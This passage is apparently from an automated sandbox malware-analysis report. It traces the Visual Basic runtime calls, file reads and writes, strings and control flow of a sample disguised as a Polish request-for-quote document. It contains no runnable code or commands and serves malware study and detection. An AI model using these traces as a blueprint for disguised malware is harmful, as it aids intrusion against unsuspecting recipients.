                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                                                                                                                                                                                        • Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B4C8
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                                                                                                                                                                                        • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00406F28,?), ref: 0040B56A
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0D4,00000000), ref: 0040B5CC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RU,00000000,00000000), ref: 0040B5E5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B5F0
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B611
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( RU,00000000), ref: 0040B62A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B635
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B656
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00004008,00000000,0042C0D4), ref: 0040B691
                                                                                                                                                                                                                                                      • __vbaEnd.MSVBVM60 ref: 0040B6A4
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BA01
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040BA15
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BA22
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BA32
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040BA4A
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B413
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040CB52
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040CB7A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CB85
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00000000), ref: 0040CB94
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(80000002,00000000,00000000,80000002,00000000,00000000), ref: 0040CBE5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040B2E7
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040B1D7
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0E4
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040CBF9
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CC06
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC16
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CC2E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040CC42
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CC4F
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC5F
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CC77
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040CC8B
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CC98
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCA8
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CCC0
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040CCD4
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CCE1
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCF1
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CD09
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD1B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CD26
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040CD3B
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040CD42
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CD4D
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CD5A
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CD72
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CD8A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD9C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CDA7
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040CDBC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040CDC3
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CDCE
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CDDB
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CDF3
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(at.,00000000), ref: 0040CE0F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CE1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040CE28
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CE33
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CE40
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE50
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CE68
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040CE7C
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CE89
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE99
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CEB3,0042C160), ref: 00411F1E
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00411F4E
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(0040CEB3,?,?,?,00000000,004032B6), ref: 00411F69
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F7D
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00411F86
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F97
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?,004156AF), ref: 0041565A
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415667
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415674
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415681
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041568D
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 00415696
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 0041569F
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 004156A8
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CEE1
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407978,0000005C), ref: 0040CF27
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040CF42
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0040CFB1), ref: 0040CFA1
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0040CFAA
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaErase.MSVBVM60(004065BC,0042C078,0000000A,-00000061,6CF8DF85), ref: 00411B74
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaRedim.MSVBVM60(00000000,00000024,0042C078,004065BC,00000001,00000003,00000001), ref: 00411B97
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411BAA
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaGenerateBoundsError.MSVBVM60 ref: 00411BCE
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411BFE
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?), ref: 00411C14
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411C1A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00411C2C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaAryUnlock.MSVBVM60(?), ref: 00411C3E
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411C4F
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60 ref: 0040CFD8
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040CFFE
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040D02E
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000728), ref: 0040D081
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004077C4,0000001C), ref: 0040D0C9
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 0040D0ED
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040D0FA
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D164
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Free$Copy$List$Error$CheckHresult$Bstr$ChkstkSystem$AnsiNew2Unicode$#580$#525#600File$#517#537#616Unlock$#631$#516#570#648Open$#618#690Get3LockNameSeek$#529#535#598#611#661#669#705#709BoundsCloseComputerDestructEraseFromGenerateGet4OverflowPathRedimUser
                                                                                                                                                                                                                                                      • String ID: MR$ PR$ RO$ RU$ SE$:%7$Once$at $at.$system32\drivers\$system\$yLZ$~
                                                                                                                                                                                                                                                      • API String ID: 3992495243-2767012170
                                                                                                                                                                                                                                                      • Opcode ID: c75b1a3e694dbd6f5d10d2331ab2ca9d09b35fafcf85166375154907e56220f4
                                                                                                                                                                                                                                                      • Instruction ID: c9e735e97b199634a30fa5df19e6cf838b9fc4480779932f55755727901e6869
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c75b1a3e694dbd6f5d10d2331ab2ca9d09b35fafcf85166375154907e56220f4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2531A75A00208EFDB14DFA0EE89BDEBBB5EF48304F108169E506B72A0DB745A45CF59

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 384 4218d0-4219be __vbaChkstk __vbaStrCopy * 3 __vbaOnError #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen __vbaI2I4 #570 __vbaLenBstr 385 4219c4-4219c7 384->385 386 42203f-422045 __vbaErrorOverflow 384->386 385->386 387 4219cd-4219db 385->387 388 4219e1-421ab0 __vbaLenBstr #525 __vbaStrMove __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 __vbaStrCopy call 4115d0 __vbaStrMove call 4115d0 __vbaStrMove __vbaStrCmp __vbaFreeStrList 387->388 389 421adf-421af6 __vbaI2I4 __vbaFileClose 387->389 396 421ab2-421b08 388->396 397 421ac1-421ad8 __vbaI2I4 __vbaFileClose 388->397 390 421fd1-422027 __vbaFreeStr * 5 389->390 396->386 400 421b0e-421b56 __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 396->400 397->390 400->386 401 421b5c-421b5f 400->401 401->386 402 421b65-421c13 __vbaI2I4 __vbaFileSeek call 415af0 #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen #525 __vbaStrMove 401->402 405 421c19-421c26 402->405 406 421d16-421e0b __vbaI2I4 __vbaFileClose call 415af0 #648 __vbaFreeVar __vbaI2I4 __vbaFileOpen __vbaI2I4 __vbaFileClose #580 __vbaI2I4 __vbaFileOpen #525 __vbaStrMove 405->406 407 421c2c-421c39 405->407 413 421e11-421e1e 406->413 407->386 409 421c3f-421c45 407->409 411 421c47-421c91 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 409->411 412 421c9c-421ca9 409->412 411->386 414 421c97-421c9a 411->414 412->386 415 421caf-421cb2 412->415 416 421e24-421e31 413->416 417 421f1b-421fcb __vbaI2I4 __vbaFileClose __vbaI2I4 __vbaFileClose __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStr __vbaFreeVar #600 413->417 418 421d11 414->418 415->386 419 421cb8-421d0b #525 __vbaStrMove __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 415->419 416->386 420 421e37-421e3d 416->420 417->390 418->405 419->418 421 421e94-421ea1 420->421 422 421e3f-421e89 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 420->422 421->386 424 421ea7-421eaa 421->424 422->386 423 421e8f-421e92 422->423 425 421f09-421f16 #598 423->425 424->386 426 421eb0-421f03 #525 __vbaStrMove __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 424->426 425->413 426->425
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,0040C78D,00000000,00000000), ref: 004218EE
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042191B
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421927
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421933
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00421942
                                                                                                                                                                                                                                                      • #648.MSVBVM60(0000000A), ref: 00421961
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00421970
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60(?), ref: 00421984
                                                                                                                                                                                                                                                      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00421992
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 004219A2
                                                                                                                                                                                                                                                      • #570.MSVBVM60(00000000), ref: 004219A9
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219B6
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219ED
                                                                                                                                                                                                                                                      • #525.MSVBVM60(00000000), ref: 004219F4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004219FF
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00421A0F
                                                                                                                                                                                                                                                      • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00421A1A
                                                                                                                                                                                                                                                      • __vbaI2I4.MSVBVM60 ref: 00421A2A
                                                                                                                                                                                                                                                      • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00421A37
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 00421A4C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
